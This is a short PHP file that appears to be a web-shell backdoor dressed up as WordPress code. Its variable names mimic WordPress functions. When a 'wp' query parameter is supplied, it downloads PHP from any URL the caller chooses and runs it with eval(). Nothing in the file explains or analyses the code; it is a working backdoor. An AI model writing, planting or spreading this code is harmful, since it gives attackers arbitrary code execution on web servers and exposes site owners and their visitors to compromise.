<?php
if (isset($_GET['wp'])) {
$is_wp_error_wnw = $_GET['wp'];
if ($get_search_form_ax = curl_init()) {
curl_setopt($get_search_form_ax, CURLOPT_URL, $is_wp_error_wnw);
curl_setopt($get_search_form_ax, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($get_search_form_ax));
curl_close($get_search_form_ax);
exit;
}
}